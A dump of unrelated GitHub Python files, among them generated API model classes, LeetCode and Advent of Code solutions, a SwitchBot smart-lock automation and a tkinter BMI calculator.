\"card_account\",\n \"customer\": \"customer\",\n \"merchant_order\": \"merchant_order\",\n \"payment_method\": \"payment_method\",\n \"recurring_data\": \"recurring_data\",\n }\n\n def __init__(\n self,\n callback_time=None,\n card_account=None,\n customer=None,\n merchant_order=None,\n payment_method=None,\n recurring_data=None,\n ): # noqa: E501\n \"\"\"RecurringCallback - a model defined in Swagger\"\"\" # noqa: E501\n\n self._callback_time = None\n self._card_account = None\n self._customer = None\n self._merchant_order = None\n self._payment_method = None\n self._recurring_data = None\n self.discriminator = None\n\n if callback_time is not None:\n self.callback_time = callback_time\n if card_account is not None:\n self.card_account = card_account\n if customer is not None:\n self.customer = customer\n if merchant_order is not None:\n self.merchant_order = merchant_order\n if payment_method is not None:\n self.payment_method = payment_method\n if recurring_data is not None:\n self.recurring_data = recurring_data\n\n @property\n def callback_time(self):\n \"\"\"Gets the callback_time of this RecurringCallback. # noqa: E501\n\n Date and time of created callback in [ISO 8601](https://en.wikipedia.org/wiki/ISO_8601) format # noqa: E501\n\n :return: The callback_time of this RecurringCallback. # noqa: E501\n :rtype: str\n \"\"\"\n return self._callback_time\n\n @callback_time.setter\n def callback_time(self, callback_time):\n \"\"\"Sets the callback_time of this RecurringCallback.\n\n Date and time of created callback in [ISO 8601](https://en.wikipedia.org/wiki/ISO_8601) format # noqa: E501\n\n :param callback_time: The callback_time of this RecurringCallback. # noqa: E501\n :type: str\n \"\"\"\n\n self._callback_time = callback_time\n\n @property\n def card_account(self):\n \"\"\"Gets the card_account of this RecurringCallback. # noqa: E501\n\n Card account data # noqa: E501\n\n :return: The card_account of this RecurringCallback. 
# noqa: E501\n :rtype: PaymentResponseCardAccount\n \"\"\"\n return self._card_account\n\n @card_account.setter\n def card_account(self, card_account):\n \"\"\"Sets the card_account of this RecurringCallback.\n\n Card account data # noqa: E501\n\n :param card_account: The card_account of this RecurringCallback. # noqa: E501\n :type: PaymentResponseCardAccount\n \"\"\"\n\n self._card_account = card_account\n\n @property\n def customer(self):\n \"\"\"Gets the customer of this RecurringCallback. # noqa: E501\n\n Customer data # noqa: E501\n\n :return: The customer of this RecurringCallback. # noqa: E501\n :rtype: RecurringCustomer\n \"\"\"\n return self._customer\n\n @customer.setter\n def customer(self, customer):\n \"\"\"Sets the customer of this RecurringCallback.\n\n Customer data # noqa: E501\n\n :param customer: The customer of this RecurringCallback. # noqa: E501\n :type: RecurringCustomer\n \"\"\"\n\n self._customer = customer\n\n @property\n def merchant_order(self):\n \"\"\"Gets the merchant_order of this RecurringCallback. # noqa: E501\n\n Merchant order data # noqa: E501\n\n :return: The merchant_order of this RecurringCallback. # noqa: E501\n :rtype: TransactionResponseMerchantOrder\n \"\"\"\n return self._merchant_order\n\n @merchant_order.setter\n def merchant_order(self, merchant_order):\n \"\"\"Sets the merchant_order of this RecurringCallback.\n\n Merchant order data # noqa: E501\n\n :param merchant_order: The merchant_order of this RecurringCallback. # noqa: E501\n :type: TransactionResponseMerchantOrder\n \"\"\"\n\n self._merchant_order = merchant_order\n\n @property\n def payment_method(self):\n \"\"\"Gets the payment_method of this RecurringCallback. # noqa: E501\n\n Used payment method type name from payment methods list # noqa: E501\n\n :return: The payment_method of this RecurringCallback. # noqa: E501\n :rtype: str\n \"\"\"\n return self._payment_method\n\n @payment_method.setter\n def payment_method(self, payment_method):\n \"\"\"Sets the payment_method of this RecurringCallback.\n\n Used payment method type name from payment methods list # noqa: E501\n\n :param payment_method: The payment_method of this RecurringCallback. # noqa: E501\n :type: str\n \"\"\"\n\n self._payment_method = payment_method\n\n @property\n def recurring_data(self):\n \"\"\"Gets the recurring_data of this RecurringCallback. # noqa: E501\n\n Recurring data # noqa: E501\n\n :return: The recurring_data of this RecurringCallback. # noqa: E501\n :rtype: RecurringResponseRecurringData\n \"\"\"\n return self._recurring_data\n\n @recurring_data.setter\n def recurring_data(self, recurring_data):\n \"\"\"Sets the recurring_data of this RecurringCallback.\n\n Recurring data # noqa: E501\n\n :param recurring_data: The recurring_data of this RecurringCallback. 
# noqa: E501\n :type: RecurringResponseRecurringData\n \"\"\"\n\n self._recurring_data = recurring_data\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(\n map(lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x, value)\n )\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(\n map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\")\n else item,\n value.items(),\n )\n )\n else:\n if value is not None:\n result[attr] = value\n if issubclass(RecurringCallback, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, RecurringCallback):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","repo_name":"cardpay/python-sdk-v3","sub_path":"cardpay/model/recurring_callback.py","file_name":"recurring_callback.py","file_ext":"py","file_size_in_byte":9077,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"23776850041","text":"'''\nIntersection of Two Arrays II\n\nGiven two integer arrays nums1 and nums2, return an array of their intersection. Each element in the result must appear as many times as it shows in both arrays and you may return the result in any order.\n\n \n\nExample 1:\n\nInput: nums1 = [1,2,2,1], nums2 = [2,2]\nOutput: [2,2]\n\nExample 2:\n\nInput: nums1 = [4,9,5], nums2 = [9,4,9,8,4]\nOutput: [4,9]\nExplanation: [9,4] is also accepted.\n\n \n\nConstraints:\n\n 1 <= nums1.length, nums2.length <= 1000\n 0 <= nums1[i], nums2[i] <= 1000\n\n \n\nFollow up:\n\n What if the given array is already sorted? How would you optimize your algorithm?\n What if nums1's size is small compared to nums2's size? Which algorithm is better?\n What if elements of nums2 are stored on disk, and the memory is limited such that you cannot load all elements into the memory at once?\n\n'''\nclass Solution:\n def intersect(self, nums1: [int], nums2: [int]) -> [int]:\n nums1_count = Counter(nums1)\n nums2_count = Counter(nums2)\n res = []\n for key, value in nums1_count.items():\n if key in nums2_count:\n res.extend([key]*min(nums1_count[key], nums2_count[key]))\n return res\n\ntime, O(m+n), space, O(min(m, n))\nclass Solution:\n def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:\n if len(nums1) > len(nums2): return self.intersect(nums2, nums1)\n \n cnt = Counter(nums1)\n ans = []\n for x in nums2:\n if cnt[x] > 0:\n ans.append(x)\n cnt[x] -= 1\n return ans","repo_name":"jomesh18/Leetcode","sub_path":"Top_interview_questions/Easy/intersect.py","file_name":"intersect.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29084658598","text":"# coding: utf-8\n\n\"\"\"\nInfluxDB OSS API Service.\n\nThe InfluxDB v2 API provides a programmatic interface for all interactions with InfluxDB. 
Access the InfluxDB API using the `/api/v2/` endpoint. # noqa: E501\n\nOpenAPI spec version: 2.0.0\nGenerated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\n\nclass PostBucketRequest(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'org_id': 'str',\n 'name': 'str',\n 'description': 'str',\n 'rp': 'str',\n 'retention_rules': 'list[BucketRetentionRules]',\n 'schema_type': 'SchemaType'\n }\n\n attribute_map = {\n 'org_id': 'orgID',\n 'name': 'name',\n 'description': 'description',\n 'rp': 'rp',\n 'retention_rules': 'retentionRules',\n 'schema_type': 'schemaType'\n }\n\n def __init__(self, org_id=None, name=None, description=None, rp='0', retention_rules=None, schema_type=None): # noqa: E501,D401,D403\n \"\"\"PostBucketRequest - a model defined in OpenAPI.\"\"\" # noqa: E501\n self._org_id = None\n self._name = None\n self._description = None\n self._rp = None\n self._retention_rules = None\n self._schema_type = None\n self.discriminator = None\n\n self.org_id = org_id\n self.name = name\n if description is not None:\n self.description = description\n if rp is not None:\n self.rp = rp\n if retention_rules is not None:\n self.retention_rules = retention_rules\n if schema_type is not None:\n self.schema_type = schema_type\n\n @property\n def org_id(self):\n \"\"\"Get the org_id of this PostBucketRequest.\n\n The organization ID. Specifies the organization that owns the bucket.\n\n :return: The org_id of this PostBucketRequest.\n :rtype: str\n \"\"\" # noqa: E501\n return self._org_id\n\n @org_id.setter\n def org_id(self, org_id):\n \"\"\"Set the org_id of this PostBucketRequest.\n\n The organization ID. Specifies the organization that owns the bucket.\n\n :param org_id: The org_id of this PostBucketRequest.\n :type: str\n \"\"\" # noqa: E501\n if org_id is None:\n raise ValueError(\"Invalid value for `org_id`, must not be `None`\") # noqa: E501\n self._org_id = org_id\n\n @property\n def name(self):\n \"\"\"Get the name of this PostBucketRequest.\n\n The bucket name.\n\n :return: The name of this PostBucketRequest.\n :rtype: str\n \"\"\" # noqa: E501\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"Set the name of this PostBucketRequest.\n\n The bucket name.\n\n :param name: The name of this PostBucketRequest.\n :type: str\n \"\"\" # noqa: E501\n if name is None:\n raise ValueError(\"Invalid value for `name`, must not be `None`\") # noqa: E501\n self._name = name\n\n @property\n def description(self):\n \"\"\"Get the description of this PostBucketRequest.\n\n A description of the bucket.\n\n :return: The description of this PostBucketRequest.\n :rtype: str\n \"\"\" # noqa: E501\n return self._description\n\n @description.setter\n def description(self, description):\n \"\"\"Set the description of this PostBucketRequest.\n\n A description of the bucket.\n\n :param description: The description of this PostBucketRequest.\n :type: str\n \"\"\" # noqa: E501\n self._description = description\n\n @property\n def rp(self):\n \"\"\"Get the rp of this PostBucketRequest.\n\n The retention policy for the bucket. 
For InfluxDB 1.x, specifies the duration of time that each data point in the retention policy persists. If you need compatibility with InfluxDB 1.x, specify a value for the `rp` property; otherwise, see the `retentionRules` property. [Retention policy](https://docs.influxdata.com/influxdb/v1.8/concepts/glossary/#retention-policy-rp) is an InfluxDB 1.x concept. The InfluxDB 2.x and Cloud equivalent is [retention period](https://docs.influxdata.com/influxdb/latest/reference/glossary/#retention-period). The InfluxDB `/api/v2` API uses `RetentionRules` to configure the retention period.\n\n :return: The rp of this PostBucketRequest.\n :rtype: str\n \"\"\" # noqa: E501\n return self._rp\n\n @rp.setter\n def rp(self, rp):\n \"\"\"Set the rp of this PostBucketRequest.\n\n The retention policy for the bucket. For InfluxDB 1.x, specifies the duration of time that each data point in the retention policy persists. If you need compatibility with InfluxDB 1.x, specify a value for the `rp` property; otherwise, see the `retentionRules` property. [Retention policy](https://docs.influxdata.com/influxdb/v1.8/concepts/glossary/#retention-policy-rp) is an InfluxDB 1.x concept. The InfluxDB 2.x and Cloud equivalent is [retention period](https://docs.influxdata.com/influxdb/latest/reference/glossary/#retention-period). The InfluxDB `/api/v2` API uses `RetentionRules` to configure the retention period.\n\n :param rp: The rp of this PostBucketRequest.\n :type: str\n \"\"\" # noqa: E501\n self._rp = rp\n\n @property\n def retention_rules(self):\n \"\"\"Get the retention_rules of this PostBucketRequest.\n\n Retention rules to expire or retain data. The InfluxDB `/api/v2` API uses `RetentionRules` to configure the [retention period](https://docs.influxdata.com/influxdb/latest/reference/glossary/#retention-period). #### InfluxDB Cloud - `retentionRules` is required. #### InfluxDB OSS - `retentionRules` isn't required.\n\n :return: The retention_rules of this PostBucketRequest.\n :rtype: list[BucketRetentionRules]\n \"\"\" # noqa: E501\n return self._retention_rules\n\n @retention_rules.setter\n def retention_rules(self, retention_rules):\n \"\"\"Set the retention_rules of this PostBucketRequest.\n\n Retention rules to expire or retain data. The InfluxDB `/api/v2` API uses `RetentionRules` to configure the [retention period](https://docs.influxdata.com/influxdb/latest/reference/glossary/#retention-period). #### InfluxDB Cloud - `retentionRules` is required. 
#### InfluxDB OSS - `retentionRules` isn't required.\n\n :param retention_rules: The retention_rules of this PostBucketRequest.\n :type: list[BucketRetentionRules]\n \"\"\" # noqa: E501\n self._retention_rules = retention_rules\n\n @property\n def schema_type(self):\n \"\"\"Get the schema_type of this PostBucketRequest.\n\n :return: The schema_type of this PostBucketRequest.\n :rtype: SchemaType\n \"\"\" # noqa: E501\n return self._schema_type\n\n @schema_type.setter\n def schema_type(self, schema_type):\n \"\"\"Set the schema_type of this PostBucketRequest.\n\n :param schema_type: The schema_type of this PostBucketRequest.\n :type: SchemaType\n \"\"\" # noqa: E501\n self._schema_type = schema_type\n\n def to_dict(self):\n \"\"\"Return the model properties as a dict.\"\"\"\n result = {}\n\n for attr, _ in self.openapi_types.items():\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Return the string representation of the model.\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`.\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Return true if both objects are equal.\"\"\"\n if not isinstance(other, PostBucketRequest):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Return true if both objects are not equal.\"\"\"\n return not self == other\n","repo_name":"influxdata/influxdb-client-python","sub_path":"influxdb_client/domain/post_bucket_request.py","file_name":"post_bucket_request.py","file_ext":"py","file_size_in_byte":8809,"program_lang":"python","lang":"en","doc_type":"code","stars":629,"dataset":"github-code","pt":"72"} +{"seq_id":"35110185881","text":"\"\"\"This module isn't mine, it's at 99% inspired from https://github.com/gurch101/StockScraper written by Gurchet Rai.\nSo all rigts reserved to Gurchet Rai.\nDocumentation http://www.gurchet-rai.net/dev/yahoo-finance-yql\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport re\nimport json\nfrom datetime import date, timedelta\n\nimport requests\n\nfrom myql.myql import YQL\n\nclass StockRetriever(YQL):\n\n def __init__(self, format='json', debug=False, oauth=None):\n \"\"\"Initialize the object\n \"\"\"\n super(StockRetriever, self).__init__(community=True, format=format, debug=debug, oauth=oauth)\n \n def __get_time_range(self, startDate, endDate):\n \"\"\"Return time range\n \"\"\"\n today = date.today()\n start_date = today - timedelta(days=today.weekday(), weeks=1)\n end_date = start_date + timedelta(days=4)\n\n startDate = startDate if startDate else str(start_date)\n endDate = endDate if endDate else str(end_date)\n \n return startDate, endDate\n\n def get_current_info(self, symbolList, columns=None):\n \"\"\"get_current_info() uses the yahoo.finance.quotes datatable to get all of the stock information presented in the main table on a typical stock page \n and a bunch of data from the key statistics page.\n \"\"\"\n response = self.select('yahoo.finance.quotes',columns).where(['symbol','in',symbolList])\n return response\n\n def get_news_feed(self, symbol):\n \"\"\"get_news_feed() uses the 
rss data table to get rss feeds under the Headlines and Financial Blogs headings on a typical stock page.\n \"\"\"\n rss_url='http://finance.yahoo.com/rss/headline?s={0}'.format(symbol)\n response = self.select('rss',['title','link','description'],limit=2).where(['url','=',rss_url])\n return response\n\n def get_historical_info(self, symbol,items=None, startDate=None, endDate=None, limit=None):\n \"\"\"get_historical_info() uses the csv datatable to retrieve all available historical data on a typical historical prices page\n \"\"\"\n startDate, endDate = self.__get_time_range(startDate, endDate)\n response = self.select('yahoo.finance.historicaldata',items,limit).where(['symbol','=',symbol],['startDate','=',startDate],['endDate','=',endDate])\n return response\n\n def get_options_info(self, symbol, items=None, expiration=''):\n \"\"\"get_options_data() uses the yahoo.finance.options table to retrieve call and put options from the options page.\n \"\"\"\n response = self.select('yahoo.finance.options',items).where(['symbol','=',symbol],[] if not expiration else ['expiration','=',expiration])\n return response\n\n def get_index_summary(self, symbol, items=None):\n \"\"\"\n \"\"\"\n response = self.select('yahoo.finance.quoteslist',items).where(['symbol','=',symbol])\n return response\n\n def get_industry_index(self, index_id,items=None):\n \"\"\"retrieves all symbols that belong to an industry.\n \"\"\"\n response = self.select('yahoo.finance.industry',items).where(['id','=',index_id])\n return response\n\n def get_xchange_rate(self, pairs, items=None):\n \"\"\"Retrieves currency exchange rate data for given pair(s). \n Accepts both where pair='eurusd, gbpusd' and where pair in ('eurusd', 'gpbusd, usdaud')\n \"\"\"\n response = self.select('yahoo.finance.xchange', items).where(['pair', 'in', pairs])\n return response\n\n def get_dividendhistory(self, symbol, startDate, endDate, items=None):\n \"\"\"Retrieves divident history\n \"\"\"\n startDate, endDate = self.__get_time_range(startDate, endDate)\n response = self.select('yahoo.finance.dividendhistory', items).where(['symbol', '=', symbol], ['startDate', '=', startDate], ['endDate', '=', endDate])\n return response\n\n def get_balancesheet(self, symbol):\n \"\"\"Retrieves balance sheet\n \"\"\"\n response = self.select('yahoo.finance.balancesheet').where(['symbol', '=', symbol])\n return response\n\n def get_symbols(self, name):\n \"\"\"Retrieves all symbols belonging to a company\n \"\"\"\n url = \"http://autoc.finance.yahoo.com/autoc?query={0}&callback=YAHOO.Finance.SymbolSuggest.ssCallback\".format(name)\n\n response = requests.get(url)\n\n json_data = re.match(\"YAHOO\\.Finance\\.SymbolSuggest.ssCallback\\((.*)\\)\", response.text)\n try:\n json_data = json_data.groups()[0]\n except (Exception,) as e:\n print(e)\n json_data = '{\"results\": \"Webservice seems to be down\"}'\n\n return type('response', (requests.Response,),{\n 'text' : json_data,\n 'content': json_data.encode(),\n 'status_code': response.status_code,\n 'reason': response.reason,\n 'encoding': response.encoding,\n 'apparent_encoding': response.apparent_encoding,\n 'cookies': response.cookies,\n 'headers': response.headers,\n 'json': lambda : json.loads(json_data),\n 'url': response.url\n })\n","repo_name":"josuebrunel/myql","sub_path":"myql/contrib/finance/stockscraper/stockretriever.py","file_name":"stockretriever.py","file_ext":"py","file_size_in_byte":5105,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"72"} 
+{"seq_id":"71522999273","text":"M = float(input())\nm = float(input())\nVM = float(input())\nvm = float(input())\n\nif VM <= vm:\n print(\"Tidak ada tumbukan\")\nelse:\n d = -1 * (vm - VM)\n momentum_total = (M * VM) + (m * vm)\n \n #Starts SPLDV solving\n #avm' + bVM' = c, dvm' - eVM' = f, d = e = 1\n\n a = [m, M, momentum_total]\n b = [M, M, M * d]\n\n elim_1 = a[0] + b[0]\n elim_2 = a[2] + b[2] \n\n vm_2 = round(elim_2 / elim_1, 2)\n VM_2 = round(vm_2 - d, 2)\n\n print(f\"{vm_2} {VM_2}\")\n\n\n\n","repo_name":"alfonsusrr/impact","sub_path":"A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25077153002","text":"#!/usr/bin/env python\n\n\"\"\"\nby Karolos Potamianos, for THE Port Hackathon 2017\n\"\"\"\n\nimport os, sys\n\nimport qrtools\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"Decode QR code\")\nparser.add_argument('-f', metavar='file', type=str, nargs=1,\n help='file with QR code to decode')\n\nargs = parser.parse_args()\nfileName = args.f[0]\n\nprint(fileName)\n\nqr = qrtools.QR()\nqr.decode(fileName)\nprint(qr.data)\n","repo_name":"THEPortatCERN/Hackathon2017-Pier49","sub_path":"python/readQR.py","file_name":"readQR.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22274587255","text":"import correction\nimport ocr\nimport cv2\nimport sys\n\n\ndef main(argv):\n img_path = \"./images/cfva648.jpg\"\n DEBUG_MODE = False\n\n for option in argv:\n if option in ('-d', '--debug'):\n print('Running in DEBUG mode...')\n DEBUG_MODE = True\n if len(argv) > 0:\n img_path = argv[0]\n \n # This will only work when correction the code to get the bounding boxes has been completed\n # corrected_img = correction.correct(img_path, True)\n # ocr.ocr(corrected_img, True)\n\n\n # In the mean time, correction() and ocr() can be tested individually.\n # Below is sample test code.\n\n # For now, correction() only works if the bounding boxes have been hardcoded\n correction.correct(\"images/perspective.jpg\", debug_mode=DEBUG_MODE)\n\n # ocr works with any image\n img = cv2.imread(img_path)\n ocr.ocr(img, debug_mode=DEBUG_MODE)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])","repo_name":"VincentMadoreC/ProjectCSI4900","sub_path":"LicencePlateRecognition/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31266275411","text":"import sys\n\ndef read():\n lines = []\n for line in open(sys.argv[1]):\n if line.strip() == '':\n yield lines\n lines = []\n else:\n lines.append(line.strip())\n if lines:\n yield lines\n\n\nn_1, n_2 = 0, 0\nfor groups in read():\n answers_1 = set.union(*[set(group) for group in groups])\n answers_2 = set.intersection(*[set(group) for group in groups])\n print(groups, answers_1, answers_2)\n n_1 += len(answers_1)\n n_2 += len(answers_2)\n\nprint(n_1, n_2)\n","repo_name":"erikbern/advent-of-code-2020","sub_path":"day_6.py","file_name":"day_6.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"3345390817","text":"# Definition for a binary tree node.\r\nclass TreeNode:\r\n def __init__(self, x):\r\n self.val = x\r\n self.left = None\r\n self.right = 
None\r\n\r\n\"\"\"\r\n中序遍历,存储结果到两个数组,\r\n反转其中一个数组,结果出错。\r\n\"\"\"\r\nclass Solution2:\r\n def isSymmetric(self, root: TreeNode) -> bool:\r\n if not root:\r\n return True\r\n tree1, tree2 = root.left, root.right\r\n nums1, nums2 = [], []\r\n self.leftsearch(tree1, nums1)\r\n self.rightsearch(tree2, nums2)\r\n print(nums1)\r\n print(nums2)\r\n nums2.reverse()\r\n return nums1 == nums2\r\n\r\n def leftsearch(self, tree, nums):\r\n # print(tree.val)\r\n if tree == None:\r\n return\r\n\r\n # if not tree.left and not tree.right:\r\n # return\r\n self.leftsearch(tree.left, nums)\r\n nums.append(tree.val)\r\n self.leftsearch(tree.right, nums)\r\n\r\n def rightsearch(self, tree, nums):\r\n # print(tree.val)\r\n if tree == None:\r\n return\r\n\r\n # if not tree.left and not tree.right:\r\n # return\r\n self.rightsearch(tree.left, nums)\r\n nums.append(tree.val)\r\n self.rightsearch(tree.right, nums)\r\n\r\na, b, c, d, e, f, g = TreeNode(1), TreeNode(2), TreeNode(2), TreeNode('null'), TreeNode(3), TreeNode('null'), TreeNode(3)\r\na.left, a.right, b.left, b.right, c.left, c.right = b, c, d, e, f, g\r\n\r\nprint(Solution2().isSymmetric(a))","repo_name":"Hegemony/Python-Practice","sub_path":"LeetCode practice/Top 100/101-2.py","file_name":"101-2.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6866299537","text":"import appdaemon.plugins.hass.hassapi as hass\nimport uuid\nfrom switchbot import SwitchBot\n\nclass SwitchBotLockManager(hass.Hass):\n\n def initialize(self):\n self.log('----------------------initialize')\n self.log(\"Switchbot initialized in AppDaemon...\")\n \n self.boolean_lock_deviceid = self.args[\"boolean_lock_deviceid\"]\n self.log(\"boolean_lock_deviceid= \" + self.boolean_lock_deviceid)\n\n self.status_update_interval_minutes = self.args[\"status_update_interval_minutes\"]\n self.log(\"status_update_interval_minutes= \" + str(self.status_update_interval_minutes))\n\n self.status_update_interval_seconds = self.status_update_interval_minutes * 60\n self.log(\"status_update_interval_seconds= \" + str(self.status_update_interval_seconds))\n\n self.push_notifiy_intity = self.args[\"push_notifiy_intity\"]\n self.log(\"push_notifiy_intity= \" + str(self.push_notifiy_intity))\n\n self.api_token = self.args[\"api_token\"]\n self.log(\"api_token= \" + str(self.api_token))\n self.api_secret = self.args[\"api_secret\"]\n self.log(\"api_secret= \" + str(self.api_secret))\n \n self.lock_name = self.boolean_lock_deviceid\n self.lock_name = self.lock_name.split('.')[1]\n self.log(\"lock_name= \" + self.lock_name)\n \n #self.switchbot = SwitchBot(token=self.api_token, secret=self.api_secret, nonce=str(uuid.uuid4()))\n self.switchbot = SwitchBot(token=self.api_token, secret=self.api_secret)\n #devices = self.switchbot.devices()\n #for device in devices:\n # print(device)\n \n self.listen_state(self.state_change, self.boolean_lock_deviceid)\n self.run_every(self.pull_status_update, \"now\", self.status_update_interval_seconds)\n self.log('----------------------initialize--end')\n \n def state_change(self, entity, attribute, old, new, kwargs):\n self.log('----------------------state_change')\n self.log('old= ' + old)\n self.log('new= ' + new)\n\n #self.switchbot = SwitchBot(token=self.args[\"api_token\"], secret=self.args[\"api_secret\"], nonce=str(uuid.uuid4()))\n self.switchbot = SwitchBot(token=self.api_token, secret=self.api_secret)\n self.lock = 
self.switchbot.device(id=self.args[\"smartlock_deviceid\"])\n lockstatus = self.lock.status()\n self.log(\"lock_state= \" + lockstatus[\"lock_state\"])\n self.log(\"door_state= \" + lockstatus[\"door_state\"])\n self.log(\"calibrate3= \" + str(lockstatus[\"calibrate\"]))\n self.log(\"battery= \" + str(lockstatus[\"battery\"]))\n \n if new == \"on\" and lockstatus[\"lock_state\"] == \"unlocked\":\n self.log(\"Attempting to Lock...\")\n self.lock.lock()\n self.turn_on(self.boolean_lock_deviceid )\n self.log(\"...Done Locking\")\n self.call_service(self.push_notifiy_intity, message=\"Lock [\"+self.lock_name+\"] Locked\")\n elif new == \"off\" and lockstatus[\"lock_state\"] == \"locked\":\n self.log(\"Attempting to UnLock...\")\n self.lock.unlock()\n self.turn_off(self.boolean_lock_deviceid )\n self.log(\"...Done Unlocking\")\n self.call_service(self.push_notifiy_intity, message=\"Lock [\"+self.lock_name+\"] UnLocked\")\n else:\n self.log(\"Nothing Done...\")\n self.call_service(self.push_notifiy_intity, message=\"Nothing done, Lock [\"+self.lock_name+\"] is already: \"+lockstatus[\"lock_state\"] )\n\n def pull_status_update(self, kwargs):\n self.log('----------------------pull_status_update')\n self.log(\"Executing periodic update....\")\n #self.switchbot = SwitchBot(token=self.args[\"api_token\"], secret=self.args[\"api_secret\"], nonce=str(uuid.uuid4()))\n self.switchbot = SwitchBot(token=self.api_token, secret=self.api_secret)\n self.lock = self.switchbot.device(id=self.args[\"smartlock_deviceid\"])\n lockstatus = self.lock.status()\n self.log(\"lock_state= \" + lockstatus[\"lock_state\"])\n self.log(\"door_state= \" + lockstatus[\"door_state\"])\n \n for value in lockstatus.values():\n self.log(value)\n \n self.log(\"calibrate4= \" + str(lockstatus[\"calibrate\"]))\n \n\n boolean_lock_device_state = self.get_state(self.boolean_lock_deviceid)\n self.log(\"boolean_lock_device_state= \" + boolean_lock_device_state)\n\n if lockstatus[\"lock_state\"] == \"unlocking\" or lockstatus[\"lock_state\"] == \"locking\":\n self.log(\"Nothing to update. lock_state: \" +lockstatus[\"lock_state\"])\n elif lockstatus[\"lock_state\"] == \"locked\" and boolean_lock_device_state == \"off\":\n self.turn_on(self.boolean_lock_deviceid)\n self.log(\"status updated to: \" +lockstatus[\"lock_state\"])\n elif lockstatus[\"lock_state\"] == \"unlocked\" and boolean_lock_device_state == \"on\":\n self.turn_off(self.boolean_lock_deviceid)\n self.log(\"status updated to: \" +lockstatus[\"lock_state\"])\n elif lockstatus[\"lock_state\"] == \"locked\" or lockstatus[\"lock_state\"] == \"unlocked\":\n self.log(\"Nothing to update. 
lock_state: \" +lockstatus[\"lock_state\"])\n else:\n self.log(\"Periodic update, Unknown lock_state: \"+lockstatus[\"lock_state\"])\n self.call_service(self.push_notifiy_intity, message=\"Periodic update, Unknown lock_state: \"+lockstatus[\"lock_state\"])\n\n","repo_name":"wbsoul/SwitchBotLockManager","sub_path":"switchbotlockmanager.py","file_name":"switchbotlockmanager.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"72291004072","text":"import tkinter\n\nwindow = tkinter.Tk()\nwindow.title(\"BMI Calculator\")\nwindow.minsize(width=250,height=210)\nboslukLabel = tkinter.Label(text=\"\")\nboslukLabel.pack()\n\nboslukLabel1 = tkinter.Label(text=\"\")\nboslukLabel2 = tkinter.Label(text=\"\")\n\n#weight\nweightLabel = tkinter.Label(text=\"Enter Your Weight (kg)\")\nweightLabel.pack()\n\ndef getentryWeight ():\n height = heightEntry.get()\n weight = weightEntry.get()\n\n if weight == \"\" or height == \"\":\n resultLabel.config(text=\"Enter Weight and Height !!\")\n else:\n try:\n bmi = float(weight) / (float(height) / 100) ** 2\n resultString = writeResult(bmi)\n resultLabel.config(text=resultString)\n except:\n resultLabel.config(text=\"Enter a valid Number\")\n\nweightEntry = tkinter.Entry(width=20)\nweightEntry.pack()\n\n#bosluk label\n\nboslukLabel2.pack()\n\n#height\n\nheightLabel = tkinter.Label(text=\"Enter Your Height (cm)\")\nheightLabel.pack()\n\n\nheightEntry = tkinter.Entry(width=20)\nheightEntry.pack()\n\n\nboslukLabel1.pack()\n\nButton = tkinter.Button(text=\"Calculate\",command=getentryWeight)\nButton.pack()\n\nresultLabel = 